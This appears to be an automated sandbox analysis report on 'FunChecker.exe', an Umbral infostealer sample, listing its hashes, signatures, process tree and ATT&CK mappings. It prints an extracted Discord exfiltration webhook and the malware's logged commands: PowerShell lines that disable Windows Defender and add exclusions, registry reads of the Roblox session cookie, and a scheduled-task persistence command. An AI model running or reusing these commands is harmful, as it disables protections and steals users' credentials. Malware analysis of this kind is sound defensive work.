Analysis
-
max time kernel
46s -
max time network
47s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
17-07-2024 18:01
Static task
static1
General
-
Target
FunChecker.exe
-
Size
7.0MB
-
MD5
84a2cb1d7bd73f291bc99188eb702114
-
SHA1
93c2ebc09dfadf515fb6075f57f93aff693f2e16
-
SHA256
1707093d8ee6f93cc5938d2c46eddb565c1ae217587ae43ab0c8ae6a3d2ccf8f
-
SHA512
d33655c5c0cdaa062a5888e16ea91330c63f22d5475c94c16fcf7c2021820c051ea2a09fc6572a5a436ec0fb0f49a37c5c7e615e340999d4ade64c2231c077a2
-
SSDEEP
196608:TBE2AD5NnNVtIwOUj+pq6bpMMbmvqxk3btIJ0jSQ9:TBE2ADnNVGwOUjwqspM2mvekt
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1263163627955818638/O6H0XtkfVMlzt1CR2LtuxnT8hf_eK3rxCg4Z8Ho7QTiBTbC3moAh35BYkmVLUE-l4NEA
Signatures
-
Detect Umbral payload 3 IoCs
resource yara_rule behavioral1/memory/2556-21-0x0000000000400000-0x0000000000D68000-memory.dmp family_umbral behavioral1/memory/2556-24-0x0000000000400000-0x0000000000D68000-memory.dmp family_umbral behavioral1/memory/2556-1342-0x0000000000400000-0x0000000000D68000-memory.dmp family_umbral -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Microsoft OneDrive.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ svchost.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4412 powershell.exe 820 powershell.exe 3432 powershell.exe 1844 powershell.exe 4836 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts svchost.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Microsoft OneDrive.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Microsoft OneDrive.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion svchost.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FunChecker.lnk Microsoft OneDrive.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FunChecker.lnk Microsoft OneDrive.exe -
Executes dropped EXE 2 IoCs
pid Process 3088 Microsoft OneDrive.exe 2556 svchost.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x000800000001ac2a-7.dat themida behavioral1/files/0x000800000001ac2b-14.dat themida behavioral1/memory/3088-20-0x0000000000400000-0x0000000000D22000-memory.dmp themida behavioral1/memory/3088-22-0x0000000000400000-0x0000000000D22000-memory.dmp themida behavioral1/memory/2556-21-0x0000000000400000-0x0000000000D68000-memory.dmp themida behavioral1/memory/2556-24-0x0000000000400000-0x0000000000D68000-memory.dmp themida behavioral1/memory/2556-1342-0x0000000000400000-0x0000000000D68000-memory.dmp themida -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\FunChecker = "C:\\Users\\Admin\\AppData\\Roaming\\FunChecker.exe" Microsoft OneDrive.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Microsoft OneDrive.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 15 discord.com 16 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 ip-api.com 12 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3088 Microsoft OneDrive.exe 2556 svchost.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\rescache\_merged\4183903823\2290032291.pri taskmgr.exe File created C:\Windows\rescache\_merged\1601268389\715946058.pri taskmgr.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 5104 wmic.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4772 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 63 IoCs
pid Process 3088 Microsoft OneDrive.exe 3088 Microsoft OneDrive.exe 2556 svchost.exe 2556 svchost.exe 820 powershell.exe 820 powershell.exe 3432 powershell.exe 3432 powershell.exe 820 powershell.exe 3432 powershell.exe 4404 powershell.exe 1844 powershell.exe 4404 powershell.exe 1844 powershell.exe 4404 powershell.exe 1844 powershell.exe 3616 powershell.exe 3616 powershell.exe 3616 powershell.exe 4836 powershell.exe 4836 powershell.exe 3884 powershell.exe 3884 powershell.exe 4836 powershell.exe 3884 powershell.exe 4412 powershell.exe 4412 powershell.exe 4412 powershell.exe 1936 powershell.exe 1936 powershell.exe 1936 powershell.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 3088 Microsoft OneDrive.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3088 Microsoft OneDrive.exe Token: SeDebugPrivilege 2556 svchost.exe Token: SeDebugPrivilege 820 powershell.exe Token: SeDebugPrivilege 3432 powershell.exe Token: SeDebugPrivilege 4404 powershell.exe Token: SeDebugPrivilege 1844 powershell.exe Token: SeDebugPrivilege 3616 powershell.exe Token: SeDebugPrivilege 4836 powershell.exe Token: SeDebugPrivilege 3884 powershell.exe Token: SeIncreaseQuotaPrivilege 3484 wmic.exe Token: SeSecurityPrivilege 3484 wmic.exe Token: SeTakeOwnershipPrivilege 3484 wmic.exe Token: SeLoadDriverPrivilege 3484 wmic.exe Token: SeSystemProfilePrivilege 3484 wmic.exe Token: SeSystemtimePrivilege 3484 wmic.exe Token: SeProfSingleProcessPrivilege 3484 wmic.exe Token: SeIncBasePriorityPrivilege 3484 wmic.exe Token: SeCreatePagefilePrivilege 3484 wmic.exe Token: SeBackupPrivilege 3484 wmic.exe Token: SeRestorePrivilege 3484 wmic.exe Token: SeShutdownPrivilege 3484 wmic.exe Token: SeDebugPrivilege 3484 wmic.exe Token: SeSystemEnvironmentPrivilege 3484 wmic.exe Token: SeRemoteShutdownPrivilege 3484 wmic.exe Token: SeUndockPrivilege 3484 wmic.exe Token: SeManageVolumePrivilege 3484 wmic.exe Token: 33 3484 wmic.exe Token: 34 3484 wmic.exe Token: 35 3484 wmic.exe Token: 36 3484 wmic.exe Token: SeIncreaseQuotaPrivilege 3484 wmic.exe Token: SeSecurityPrivilege 3484 wmic.exe Token: SeTakeOwnershipPrivilege 3484 wmic.exe Token: SeLoadDriverPrivilege 3484 wmic.exe Token: SeSystemProfilePrivilege 3484 wmic.exe Token: SeSystemtimePrivilege 3484 wmic.exe Token: SeProfSingleProcessPrivilege 3484 wmic.exe Token: SeIncBasePriorityPrivilege 3484 wmic.exe Token: SeCreatePagefilePrivilege 3484 wmic.exe Token: SeBackupPrivilege 3484 wmic.exe Token: SeRestorePrivilege 3484 wmic.exe Token: SeShutdownPrivilege 3484 wmic.exe Token: SeDebugPrivilege 3484 wmic.exe Token: SeSystemEnvironmentPrivilege 3484 wmic.exe Token: SeRemoteShutdownPrivilege 3484 wmic.exe Token: SeUndockPrivilege 3484 wmic.exe Token: SeManageVolumePrivilege 3484 wmic.exe Token: 33 3484 wmic.exe Token: 34 3484 wmic.exe Token: 35 3484 wmic.exe Token: 36 3484 wmic.exe Token: SeIncreaseQuotaPrivilege 1288 wmic.exe Token: SeSecurityPrivilege 1288 wmic.exe Token: SeTakeOwnershipPrivilege 1288 wmic.exe Token: SeLoadDriverPrivilege 1288 wmic.exe Token: SeSystemProfilePrivilege 1288 wmic.exe Token: SeSystemtimePrivilege 1288 wmic.exe Token: SeProfSingleProcessPrivilege 1288 wmic.exe Token: SeIncBasePriorityPrivilege 1288 wmic.exe Token: SeCreatePagefilePrivilege 1288 wmic.exe Token: SeBackupPrivilege 1288 wmic.exe Token: SeRestorePrivilege 1288 wmic.exe Token: SeShutdownPrivilege 1288 wmic.exe Token: SeDebugPrivilege 1288 wmic.exe -
Suspicious use of FindShellTrayWindow 43 IoCs
pid Process 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe -
Suspicious use of SendNotifyMessage 43 IoCs
pid Process 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe 1152 taskmgr.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3088 Microsoft OneDrive.exe -
Suspicious use of WriteProcessMemory 48 IoCs
description pid Process procid_target PID 3472 wrote to memory of 3088 3472 FunChecker.exe 75 PID 3472 wrote to memory of 3088 3472 FunChecker.exe 75 PID 3472 wrote to memory of 3088 3472 FunChecker.exe 75 PID 3472 wrote to memory of 2556 3472 FunChecker.exe 76 PID 3472 wrote to memory of 2556 3472 FunChecker.exe 76 PID 3472 wrote to memory of 2556 3472 FunChecker.exe 76 PID 2556 wrote to memory of 820 2556 svchost.exe 77 PID 2556 wrote to memory of 820 2556 svchost.exe 77 PID 2556 wrote to memory of 820 2556 svchost.exe 77 PID 3088 wrote to memory of 3432 3088 Microsoft OneDrive.exe 80 PID 3088 wrote to memory of 3432 3088 Microsoft OneDrive.exe 80 PID 3088 wrote to memory of 3432 3088 Microsoft OneDrive.exe 80 PID 2556 wrote to memory of 4404 2556 svchost.exe 89 PID 2556 wrote to memory of 4404 2556 svchost.exe 89 PID 2556 wrote to memory of 4404 2556 svchost.exe 89 PID 3088 wrote to memory of 1844 3088 Microsoft OneDrive.exe 84 PID 3088 wrote to memory of 1844 3088 Microsoft OneDrive.exe 84 PID 3088 wrote to memory of 1844 3088 Microsoft OneDrive.exe 84 PID 2556 wrote to memory of 3616 2556 svchost.exe 86 PID 2556 wrote to memory of 3616 2556 svchost.exe 86 PID 2556 wrote to memory of 3616 2556 svchost.exe 86 PID 3088 wrote to memory of 4836 3088 Microsoft OneDrive.exe 88 PID 3088 wrote to memory of 4836 3088 Microsoft OneDrive.exe 88 PID 3088 wrote to memory of 4836 3088 Microsoft OneDrive.exe 88 PID 2556 wrote to memory of 3884 2556 svchost.exe 90 PID 2556 wrote to memory of 3884 2556 svchost.exe 90 PID 2556 wrote to memory of 3884 2556 svchost.exe 90 PID 2556 wrote to memory of 3484 2556 svchost.exe 92 PID 2556 wrote to memory of 3484 2556 svchost.exe 92 PID 2556 wrote to memory of 3484 2556 svchost.exe 92 PID 3088 wrote to memory of 4412 3088 Microsoft OneDrive.exe 94 PID 3088 wrote to memory of 4412 3088 Microsoft OneDrive.exe 94 PID 3088 wrote to memory of 4412 3088 Microsoft OneDrive.exe 94 PID 2556 wrote to memory of 1288 2556 svchost.exe 96 PID 2556 wrote to memory of 1288 2556 svchost.exe 96 PID 2556 wrote to memory of 1288 2556 svchost.exe 96 PID 2556 wrote to memory of 3232 2556 svchost.exe 98 PID 2556 wrote to memory of 3232 2556 svchost.exe 98 PID 2556 wrote to memory of 3232 2556 svchost.exe 98 PID 2556 wrote to memory of 1936 2556 svchost.exe 100 PID 2556 wrote to memory of 1936 2556 svchost.exe 100 PID 2556 wrote to memory of 1936 2556 svchost.exe 100 PID 2556 wrote to memory of 5104 2556 svchost.exe 102 PID 2556 wrote to memory of 5104 2556 svchost.exe 102 PID 2556 wrote to memory of 5104 2556 svchost.exe 102 PID 3088 wrote to memory of 4772 3088 Microsoft OneDrive.exe 105 PID 3088 wrote to memory of 4772 3088 Microsoft OneDrive.exe 105 PID 3088 wrote to memory of 4772 3088 Microsoft OneDrive.exe 105
Processes
-
C:\Users\Admin\AppData\Local\Temp\FunChecker.exe"C:\Users\Admin\AppData\Local\Temp\FunChecker.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3472 -
C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe"C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3088 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3432
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft OneDrive.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1844
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\FunChecker.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4836 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4404
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'FunChecker.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4412
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "FunChecker" /tr "C:\Users\Admin\AppData\Roaming\FunChecker.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:4772
-
-
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:820
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4404
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3616
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3884
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3484
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1288
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:3232
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1936
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:5104
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1152
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5db01a2c1c7e70b2b038edf8ad5ad9826
SHA1540217c647a73bad8d8a79e3a0f3998b5abd199b
SHA256413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d
SHA512c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6
-
Filesize
18KB
MD5a193a1548523e2b1df0db3a55d7eef91
SHA1aba48e6718b73e973c24c0227e85bd509fa79e9a
SHA256a1a78a6f15fd374614750caef33f2b1f10005b1f270e422b8e36503374e197c5
SHA512a19db77627bc46c4ec2b0d0d9a0b0f17830b6f5a26297df0a7b31943e1b4a832bd170c6d69988b66c011735fb8eedf55341ba23f592158b4019eb4ddc885478f
-
Filesize
16KB
MD555809db6d38f5f820c0cfab63cbc0b26
SHA1056b715078630cbfa96d3bb0cc4c6b689b799a19
SHA256296eda4e689665d9a761d0948d88b039b30edbbdd593fe51ebbfa09237021b8e
SHA51256145ecf9edc9b74925b758f8ac15d59e69a30b91b342744bb63be0bb089557d035f63c6a63a059b66cb4425eb5e87c42ad1a4493a7b3c006611ee9821322ae8
-
Filesize
18KB
MD590edc4c11db6bcb2088bf62cbdf08807
SHA15631da5a87a0890c2ac748d86ebd63edf1f7db4f
SHA256df9dced671f0723b5cfc339cd78aa754bdb983b365011bf1f8a5359cda4728af
SHA5128d64c85321e1ffdfa837d9f9203f40fbe033b5b5b7c4faf00370fc378c078647352d845edbf031a80599bb46679ff0cf4c5c4a33efcffb626ee9419c1ae7e679
-
Filesize
15KB
MD59d16a5f0fb7c9938c3419eb7cbe3377a
SHA190b075d2f9165742b4960f58607bb41a4ea244ef
SHA256d8f1def526e15fda62131a33c0bd852836760316eab2085fe80f69930503da75
SHA51216f8fd8de3c320953eb64a1c70f0cb406c097364a4729a1cffa31ff0fe13f53297662241ddfb4a024800a0656ef9916c71ecd14ce7800640eb63c415c32a2d4a
-
Filesize
18KB
MD5a9b219276339f1a6c8a7c0f11b31f27f
SHA103c977724d92331290a2f13636341d3fe0b6da67
SHA256a093ff74626529d213a83e44b198957b169d2699cad8ad87d54a0334fb706cfb
SHA51217af67c4ac030312f63dd845b9fae71fdb59b2278f53605aa11d3abb3db2fb3f9436bdb20c9076fc0cbbb8530f0ac216c94ab6a2029aa005e41a30fd44bb3364
-
Filesize
3.4MB
MD58496d6a30ba3fdb1cd908cbcb41ef84e
SHA1986c94e5a502ef12b2cafab7cd21401436154e8f
SHA25665d35c5e52deb2c59470f099dfb44b05b2121e6f550a31727d3fee8f5be067cc
SHA512e28b7d3255f6639b6c1ef4ad6029ef64bcc6c0988e298465f9db2441aa30737b29bb6d3a0dc71f5e6f5835dd1553503e4b36b571c9ebfe28e4ea3398010f74d9
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
3.6MB
MD5c2f9feba8f68d6772ba7fc1536603a33
SHA1e17c6f4fc8dcad67d0449c1f2f7d0863345d72c1
SHA256005efd0dcf8e4b4726d5717f9a1dedf4977d1477fd92b4490a1f851c8ed5d59a
SHA5128fa32ba1b80d94fcc28586cda1297dac4e444a0f20071bebc2644d3024551d2556f22bd549ca3f50f557a775a170df337953cc861be62f0ef248561c1615e968
-
Filesize
826B
MD57980574074434732d3c479f4295cd61c
SHA1df10db87ddee03baa9b18779f8504eaa8e0704e1
SHA256205c0a5e935702c53ec8637227beddc188929aafb4ea00b0704610fd2ccad7a6
SHA512d94ae330c1e6e7e88aebdc87c04a779f9d60ac7b05ba7f5418c8cece512db73ab695337083b6880d1c8af2f86257e5ee7d27dc6e83bb1dd5361bb4aa113e6bd5